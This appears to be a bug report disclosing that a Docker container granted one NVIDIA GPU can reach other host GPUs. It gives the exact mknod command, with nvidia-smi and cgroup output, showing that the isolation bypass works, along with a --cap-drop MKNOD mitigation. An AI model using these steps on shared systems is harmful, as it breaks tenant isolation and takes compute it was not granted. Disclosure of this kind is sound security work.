1. Issue description
The GPU container can break the isolation to get the permission of other GPUs on the host
2. Steps to reproduce the issue
start a GPU container, and attach /dev/nvidia0
$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0 nvidia/cuda:10.1-runtime-ubuntu16.04 bash
the container can access the GPU as expected
root@5f0921a756de:/# nvidia-smi
Wed Nov 4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
| N/A 26C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
the cgroup setup c 195:0 rw
is also as expected
root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw
BUT
if I create other GPU device files with GPU0’s major/minor number, something unexpected will happen.
root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0
the /dev/nvidia1
with the nvidia0
's device number create successfully
root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236, 0 Oct 9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236, 1 Oct 9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195, 0 Oct 9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195, 0 Nov 4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct 9 01:32 /dev/nvidiactl
the GPU1 can be listed by nvidia-smi
unexpectedly
root@5f0921a756de:/# nvidia-smi
Wed Nov 4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05 Driver Version: 450.51.05 CUDA Version: 11.0 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla V100-PCIE... Off | 00000000:02:00.0 Off | 0 |
| N/A 26C P0 23W / 250W | 0MiB / 32510MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
| 1 Tesla V100-PCIE... Off | 00000000:03:00.0 Off | 0 |
| N/A 29C P0 25W / 250W | 0MiB / 32510MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
and the cgroup setup doesn’t change at all
root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw
I have run a tensorflow demo in the container, these 2 GPUs can indeed be used.
This problem can be avoid be add arg --cap-drop MKNOD
for docker run
, but docker container has the MKNOD cap by default.
And it seems like this operation can trick cgroup to get the permission of other GPUs on host.
It’s a big risk.